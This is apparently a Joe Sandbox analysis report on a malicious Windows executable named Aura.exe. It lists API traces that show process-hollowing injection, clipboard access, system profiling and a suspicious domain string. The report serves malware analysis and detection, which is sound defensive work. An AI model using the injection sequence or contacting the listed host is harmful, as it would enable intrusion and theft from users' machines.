Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xe90000
File size:	378'920 bytes
MD5 hash:	320BF7FBC1C911B3359527BF0EA85FCA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	13:36:54
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 928
Imagebase:	0x810000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	60%
Total number of Nodes:	15
Total number of Limit Nodes:	2

Executed Functions

Function 02EF8611 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02EF8583,02EF8573), ref: 02EF87A9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02EF87BC
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 02EF87DA
ReadProcessMemory.KERNELBASE(00000090,?,02EF85C7,00000004,00000000), ref: 02EF87FE
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 02EF8829
TerminateProcess.KERNELBASE(00000090,00000000), ref: 02EF8848
WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 02EF8881
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 02EF88CC
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 02EF890A
Wow64SetThreadContext.KERNEL32(00000088,05420000), ref: 02EF8946
ResumeThread.KERNELBASE(00000088), ref: 02EF8955

Strings

ResumeThread, xrefs: 02EF874D
WriteProcessMemory, xrefs: 02EF8724
aryA, xrefs: 02EF8657
VirtualAlloc, xrefs: 02EF86D8
GetP, xrefs: 02EF8693
SetThreadContext, xrefs: 02EF8737
TerminateProcess, xrefs: 02EF8838
Load, xrefs: 02EF864F
ReadProcessMemory, xrefs: 02EF86FE
ress, xrefs: 02EF869B
CreateProcessW, xrefs: 02EF86C5
VirtualAllocEx, xrefs: 02EF8711
GetThreadContext, xrefs: 02EF86EB

Memory Dump Source

Source File: 00000000.00000002.1780775076.0000000002EF8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ef8000_Aura.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 80c0b2c8614a4555e355fb79b2f638bd1932447098064799d0aae6700cdf6d15
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 4CB1077664028AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB341D774FA51CB94

Function 02EF878E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02EF8583,02EF8573), ref: 02EF87A9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02EF87BC
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 02EF87DA
ReadProcessMemory.KERNELBASE(00000090,?,02EF85C7,00000004,00000000), ref: 02EF87FE
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 02EF8829
TerminateProcess.KERNELBASE(00000090,00000000), ref: 02EF8848
WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 02EF8881
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 02EF88CC
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 02EF890A
Wow64SetThreadContext.KERNEL32(00000088,05420000), ref: 02EF8946
ResumeThread.KERNELBASE(00000088), ref: 02EF8955

Strings

TerminateProcess, xrefs: 02EF8838

Memory Dump Source

Source File: 00000000.00000002.1780775076.0000000002EF8000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ef8000_Aura.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: ca32d5105ddf020013af3cb423cb3142684d634e88835bf0a3a38da0bf2763cd
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 77312D72280646ABD774CF54CC91FEA73A5BFC8B15F148509FB09AF280C6B4BA018B94

Function 01492C3A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03EF3588,00000000,?,?,?,?,?,?,?,00BAA227,00000000,?,01491116,?,00000040), ref: 01492EC1

Strings

4, xrefs: 01492E6A

Memory Dump Source

Source File: 00000000.00000002.1780624077.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_Aura.jbxd

Similarity

API ID: ProtectVirtual
String ID: 4
API String ID: 544645111-967804232
Opcode ID: f302f7f8d4af8dbfd739c3677ec5dcafd15476ea155d46e75a8fb605b335ec4a
Instruction ID: cd8cfba4c0cd7dc39c8d033775c6b6463a4fa847cce5a95abfdd7856aea9505e
Opcode Fuzzy Hash: f302f7f8d4af8dbfd739c3677ec5dcafd15476ea155d46e75a8fb605b335ec4a
Instruction Fuzzy Hash: F0913B71A051599FCF01CBA9C5C0AEEFFF2BF49324F688656D468A7252C3749981CBA0

Function 014906E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03EF3588,00000000,?,?,?,?,?,?,?,00BAA227,00000000,?,01491116,?,00000040), ref: 01492EC1

Strings

4, xrefs: 01492E6A

Memory Dump Source

Source File: 00000000.00000002.1780624077.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_Aura.jbxd

Similarity

API ID: ProtectVirtual
String ID: 4
API String ID: 544645111-967804232
Opcode ID: e33666ce120cc3e206399a1fb547c50dea6a97e1e6935f5b27efaaecd8a93371
Instruction ID: d605f524ffd753a891535de24b39fc13380bbf6c55dd4ef7909faa599ddae175
Opcode Fuzzy Hash: e33666ce120cc3e206399a1fb547c50dea6a97e1e6935f5b27efaaecd8a93371
Instruction Fuzzy Hash: 0D21C3B5D05259AFCB00DF99D885ADEFFB4FB48320F10852AE918A7210C3B5A954CFE5

Non-executed Functions

Function 01490861 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01490939
4'^q, xrefs: 0149090E

Memory Dump Source

Source File: 00000000.00000002.1780624077.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_Aura.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 980c9d5be72d9f6ccdbe21aec4df1871796a4091cfce80ab77715ae7448a0352
Instruction ID: 4e573cc3c0697bd14736e262d5c20e733f263fc865dde64dd2713457405ecb6d
Opcode Fuzzy Hash: 980c9d5be72d9f6ccdbe21aec4df1871796a4091cfce80ab77715ae7448a0352
Instruction Fuzzy Hash: A2613BB4A006058FDB0DEF7BE9446AABBE3FBC8304B04C539C0149B678EB705449CB50

Function 01490870 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01490939
4'^q, xrefs: 0149090E

Memory Dump Source

Source File: 00000000.00000002.1780624077.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_Aura.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 8626a1a61bc8808a01376d3f03802675ab03531802359cecf2ea6391c44f65d1
Instruction ID: 8f25a45287ae8739b23a8294c1f2c83f8567f9edfb669de2f59d7175f28be870
Opcode Fuzzy Hash: 8626a1a61bc8808a01376d3f03802675ab03531802359cecf2ea6391c44f65d1
Instruction Fuzzy Hash: 3551F9B4A006158FDB1DEF7BE9546AABBE3FBC8304B04C579C0149B678EB71584A8B50

Analysis Process: Aura.exePID: 7328, Parent PID: 7256COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	36.1%
Total number of Nodes:	305
Total number of Limit Nodes:	21

Executed Functions

Function 00412670 Relevance: 163.0, APIs: 4, Strings: 88, Instructions: 2028COMMON

Download Yara Rule

Strings

?, xrefs: 00414209
8, xrefs: 00413177
g, xrefs: 00413B1B
p, xrefs: 00413E4D
1, xrefs: 00413721
K, xrefs: 004132C3
,, xrefs: 00413B7B
6, xrefs: 00414241
;, xrefs: 004141E9
j, xrefs: 00413DFD
r, xrefs: 00413E3D
@, xrefs: 0041366F
, xrefs: 00414221
B, xrefs: 00412C53
/, xrefs: 00414189
3, xrefs: 004141A9
', xrefs: 00414149
9, xrefs: 004141D9
-, xrefs: 00413F35
7, xrefs: 004141C9
D, xrefs: 00414645
6, xrefs: 00413147
`, xrefs: 004137B3
3, xrefs: 00413F75
3, xrefs: 0041282D
t, xrefs: 00413B4B
K, xrefs: 004136F9
2, xrefs: 00413712
%, xrefs: 00414139
D, xrefs: 004143BD
=, xrefs: 004141F9
z, xrefs: 0041278D
/, xrefs: 00413B6B
D, xrefs: 004138C9
v, xrefs: 00413B5B
h, xrefs: 00413E0D
;, xrefs: 00413576
1, xrefs: 00414199
l, xrefs: 00413E2D
>, xrefs: 00413F45
z, xrefs: 00413E7D
=, xrefs: 004138C1
!, xrefs: 00413157
D, xrefs: 0041364F
v, xrefs: 00413E5D
f, xrefs: 00413DDD
~, xrefs: 00413E9D
t, xrefs: 00413E6D
n, xrefs: 00413E1D
x, xrefs: 00413E8D
X, xrefs: 00413E75
), xrefs: 00412C4B
U, xrefs: 00412A05
#, xrefs: 00414129
5, xrefs: 004141B9
9, xrefs: 00414261
z, xrefs: 00413B2B
4, xrefs: 004138B9
`, xrefs: 00413DCD
=, xrefs: 00414231
r, xrefs: 00413B3B
+, xrefs: 00413167
3, xrefs: 004128F3
_, xrefs: 004128FB
0, xrefs: 00413197
7, xrefs: 00413F65
B, xrefs: 00413717
*, xrefs: 004132D3
b, xrefs: 00413566
!, xrefs: 00414119
6, xrefs: 004136FE
#, xrefs: 00413EC5
#, xrefs: 004139BA
~, xrefs: 0041365F
~, xrefs: 00412B56
W, xrefs: 00413E65
b, xrefs: 00413B0B
d, xrefs: 00413DED
|, xrefs: 00413EAD
?, xrefs: 00414271
7, xrefs: 00413596
+, xrefs: 00414169
), xrefs: 00414251
0, xrefs: 0041371C
4, xrefs: 00413708
), xrefs: 004132CB
), xrefs: 00414159
-, xrefs: 00414179

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: $!$!$#$#$#$%$'$)$)$)$)$*$+$+$,$-$-$/$/$0$0$1$1$2$3$3$3$3$4$4$5$6$6$6$7$7$7$8$9$9$;$;$=$=$=$>$?$?$@$B$B$D$D$D$D$K$K$U$W$X$_$`$`$b$b$d$f$g$h$j$l$n$p$r$r$t$t$v$v$x$z$z$z$|$~$~$~
API String ID: 0-297977114
Opcode ID: ceec4b26641d0f8f966b965c1d1781758b87c0510d6ffe354c973a9ee55910a9
Instruction ID: 737eac3a335c9a0d1baa15252772b71b9fbea87d6bae5aa7b70ef14edbf06c87
Opcode Fuzzy Hash: ceec4b26641d0f8f966b965c1d1781758b87c0510d6ffe354c973a9ee55910a9
Instruction Fuzzy Hash: E213CD7150C7C08AD3359B3884883EFBBD1ABD6324F184A2EE4E9873D2D77985868747

Function 0043E540 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 718
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(A6A1A0AE,00000000,00000001,?,00000000), ref: 0043E939
SysAllocString.OLEAUT32(4A077A98), ref: 0043E9B7
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043E9F5
SysAllocString.OLEAUT32(2DDD33DD), ref: 0043EAAF
SysAllocString.OLEAUT32(2DDD33DD), ref: 0043EB57
VariantInit.OLEAUT32(?), ref: 0043EBC9
VariantClear.OLEAUT32(?), ref: 0043ED38
SysFreeString.OLEAUT32(?), ref: 0043ED5F
SysFreeString.OLEAUT32(?), ref: 0043ED65
SysFreeString.OLEAUT32(00000000), ref: 0043ED76
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,4A077A98,00000000,00000000,00000000,00000000), ref: 0043EDAE

Strings

;8, xrefs: 0043EB17
64, xrefs: 0043E966
f6, xrefs: 0043E6CE
u0x6, xrefs: 0043EB07
{Y, xrefs: 0043E577
1>, xrefs: 0043E976
20, xrefs: 0043E96E

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: 1>$;8$f6$u0x6${Y$20$64
API String ID: 2573436264-1963117314
Opcode ID: fad7be5494af0ebf47d6149fb180ff225701b06f17455cf5b0a49fc287d7803d
Instruction ID: 5b226650a6f4d95271e70f5841ff1dfad6dc7fc5add637ef88cf8e641c36a068
Opcode Fuzzy Hash: fad7be5494af0ebf47d6149fb180ff225701b06f17455cf5b0a49fc287d7803d
Instruction Fuzzy Hash: 4E42DD716093419FE310CF2AC89575FBBE2EBC9314F14892DE5988B391DB79D805CB86

Function 03981000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03981032
OpenClipboard.USER32(00000000), ref: 0398103C
GetClipboardData.USER32(0000000D), ref: 0398104C
GlobalLock.KERNEL32(00000000), ref: 0398105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03981090
GlobalLock.KERNEL32 ref: 039810A0
GlobalUnlock.KERNEL32 ref: 039810C1
EmptyClipboard.USER32 ref: 039810CB
SetClipboardData.USER32(0000000D), ref: 039810D6
GlobalFree.KERNEL32 ref: 039810E3
GlobalUnlock.KERNEL32(?), ref: 039810ED
CloseClipboard.USER32 ref: 039810F3
GetClipboardSequenceNumber.USER32 ref: 039810F9

Memory Dump Source

Source File: 00000003.00000002.2898612583.0000000003981000.00000020.00000800.00020000.00000000.sdmp, Offset: 03980000, based on PE: true

Associated: 00000003.00000002.2898599250.0000000003980000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2898625455.0000000003982000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3980000_Aura.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 5c77acf46cd6708d928503f21aa088ab2b8fcf975029b21f6995b2b8561d8d7d
Instruction ID: 79079f2d7ce4e89efe589bcfd60839728aeec58f04b80822a668a99b4f1567fd
Opcode Fuzzy Hash: 5c77acf46cd6708d928503f21aa088ab2b8fcf975029b21f6995b2b8561d8d7d
Instruction Fuzzy Hash: 9A2188716082509BDB207FB1AC0DB5AB7ACFFC4FC1F08082AF985DA154E7218801C761

Function 004269A0 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00426A77

Strings

IV, xrefs: 0042707C
xy, xrefs: 00426F43

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: IV$xy
API String ID: 237503144-2363246849
Opcode ID: c4c7c9f3f3c6126381d7cc46f68eafd95afbbbab024512aecdc2b5b6c1c6c0b0
Instruction ID: aa0827c593e02fe81ac9b1697363bfd35ba70b6923a040715d86085f213ede14
Opcode Fuzzy Hash: c4c7c9f3f3c6126381d7cc46f68eafd95afbbbab024512aecdc2b5b6c1c6c0b0
Instruction Fuzzy Hash: 2202FDB1619350CFD300DF65E89172BBBE1EF85304F05892DE5D59B391EBB88909CB8A

Function 0040E5BF Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E5C6

Strings

ETWn, xrefs: 0040E6C4
fancywaxxers.shop, xrefs: 0040E923
")*+, xrefs: 0040E87B
IK, xrefs: 0040E843

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: Uninitialize
String ID: ")*+$ETWn$fancywaxxers.shop$IK
API String ID: 3861434553-2898764957
Opcode ID: 2f11d03bf4667a6b65a84b5ef463db9c0871d7812879cc33554196b749855a75
Instruction ID: 5f2a5b2b2c16b9dfdd27d6ff4211d76e43ad0b17e52b8521e85939151b7ea068
Opcode Fuzzy Hash: 2f11d03bf4667a6b65a84b5ef463db9c0871d7812879cc33554196b749855a75
Instruction Fuzzy Hash: 95A1E5B4144B819FD315CF2AC490752BFA2FF97314F188A5DC4D50BB86C73AA82ACB95

Function 00408890 Relevance: 7.8, APIs: 5, Instructions: 297
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088B4
GetCurrentThreadId.KERNEL32 ref: 004088BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089B2
GetForegroundWindow.USER32 ref: 00408A4D
ExitProcess.KERNEL32 ref: 00408C27

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 8e6382e2621b1126b96a1933a40f8db2a4624407d1242e00870055239901f723
Instruction ID: 03c8b7e9441611ed046ce038ac689160f0a862390474574b87a62da4f1369dec
Opcode Fuzzy Hash: 8e6382e2621b1126b96a1933a40f8db2a4624407d1242e00870055239901f723
Instruction Fuzzy Hash: 5E914B73A487044BD318AF6DDD5239AF6C2ABC4324F0E863EA995DB3D1ED7C8C054689

Function 00431430 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00431578

Strings

,, xrefs: 00431440
FSWn, xrefs: 004314C6
`, xrefs: 0043159A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ,$FSWn$`
API String ID: 3960555810-4268931162
Opcode ID: 63276757511c6734aef4dedc5626e1b26b84c79fa21edc436853b52aabf5b482
Instruction ID: 1d4db3ed01e699106b7568b68e7fa4eb461736df7d2ee35346cf870e48489c47
Opcode Fuzzy Hash: 63276757511c6734aef4dedc5626e1b26b84c79fa21edc436853b52aabf5b482
Instruction Fuzzy Hash: 18C1137150C3918BD329CF29C4503ABFBE1AFDA304F18896ED4D997392D7788905CB9A

Function 004311FA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00431578

Strings

FSWn, xrefs: 004314C6
`, xrefs: 0043159A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: FSWn$`
API String ID: 3960555810-3216616454
Opcode ID: 6c3ae6191cce82e2eb89adeaa1727eb5e82c0405d2ad1ba7c1e76853f356c342
Instruction ID: b96c5ca8b585329c056ecd319ad9b1ad275336f299055715d94840bd3257dfaa
Opcode Fuzzy Hash: 6c3ae6191cce82e2eb89adeaa1727eb5e82c0405d2ad1ba7c1e76853f356c342
Instruction Fuzzy Hash: 89B1287150C3818BD729CF29C4503ABFBE1AFDA304F18896ED4C997392D7788905CB9A

Function 004173A6 Relevance: 4.8, APIs: 1, Strings: 1, Instructions: 1298COMMON

Download Yara Rule

Strings

iemv, xrefs: 00417823

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: iemv
API String ID: 0-1078177725
Opcode ID: 32c8a5c75ae063330e94ce7ac32a3cef9d0e5ea72839009f9d377a596b08fe2c
Instruction ID: 8fdb8f1ee5a6cb983f740b0a97827f448e553d6e0a91af1706e49994ce01206e
Opcode Fuzzy Hash: 32c8a5c75ae063330e94ce7ac32a3cef9d0e5ea72839009f9d377a596b08fe2c
Instruction Fuzzy Hash: E89221B56047018FD7248F28C881767B7F2FF96314F18856DE49A8B792EB38E845CB84

Function 00409E98 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pq, xrefs: 00409F5C
WeTg, xrefs: 00409F3E
$]&', xrefs: 00409F0F

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: $]&'$WeTg$pq
API String ID: 0-3900145563
Opcode ID: 99cd5103d1241bb90cfb7090b07ad2cda72358749ff9235b2de0faaeaf3dd834
Instruction ID: 795d0fded47a1fea86dde390961a6ad5c728e2d8772339e28f03a8f5bf840b04
Opcode Fuzzy Hash: 99cd5103d1241bb90cfb7090b07ad2cda72358749ff9235b2de0faaeaf3dd834
Instruction Fuzzy Hash: 1C319CB1D012289FDB24CFA4DD957EEBBB0BB05304F5441AEE8547B385D3750A498B8A

Function 00430622 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00430720

Strings

ad\g, xrefs: 0043065C

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ComputerName
String ID: ad\g
API String ID: 3545744682-685296165
Opcode ID: 6e698a03c592093492fa2a63d8ca9a04a8131d9b409ffbe774c215409f8a78f5
Instruction ID: e4f86fd7867c925d51d06089d48d08c46738b34adcc11c328e91de1660f62654
Opcode Fuzzy Hash: 6e698a03c592093492fa2a63d8ca9a04a8131d9b409ffbe774c215409f8a78f5
Instruction Fuzzy Hash: AF313631A487D04AE3388F28C8A53F7BBE19BDB314F1C566EC4DC9B285CA384405CB56

Function 0043061D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00430720

Strings

ad\g, xrefs: 0043065C

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ComputerName
String ID: ad\g
API String ID: 3545744682-685296165
Opcode ID: 22d0e421cfc00b50c3b96e45ac38cf8a2a7a1d800af7436947f456f15ea6b938
Instruction ID: 2c98c50e133ef7481ae6a71778e7d784cf526df2963e26558c14e10bce4bef6b
Opcode Fuzzy Hash: 22d0e421cfc00b50c3b96e45ac38cf8a2a7a1d800af7436947f456f15ea6b938
Instruction Fuzzy Hash: 14212835A487908BE338CF28C8993BBBBE19BDB314F1C576DC4DD9B295CA3844018B46

Function 00430416 Relevance: 3.2, APIs: 2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430448
GetComputerNameExA.KERNELBASE(00000006,BA595575,00000100), ref: 004305E0

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 7f7061abe45febc472a21804fcc257dba0edac48d25944a62f3611e40c121c6b
Instruction ID: 9e2c4eafbe524ef7ff0483507fa8eddc484104f89d5b018183184a88b255a431
Opcode Fuzzy Hash: 7f7061abe45febc472a21804fcc257dba0edac48d25944a62f3611e40c121c6b
Instruction Fuzzy Hash: 86410876A197409BD328CF29CD637EFBBD29BDA304F08956ED0C9C7241CA7C88018B42

Function 00445280 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

C@AF, xrefs: 004452CE, 0044534F

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID: C@AF
API String ID: 2994545307-2929868782
Opcode ID: c3b3598d42260774cf7f1f41b9fea7b379c4e570dd261ea0c381986d038fda85
Instruction ID: 1e22d8f7fca29cb99470f007badfeec3efd5bf5bd1c707653f5eacacd089c7aa
Opcode Fuzzy Hash: c3b3598d42260774cf7f1f41b9fea7b379c4e570dd261ea0c381986d038fda85
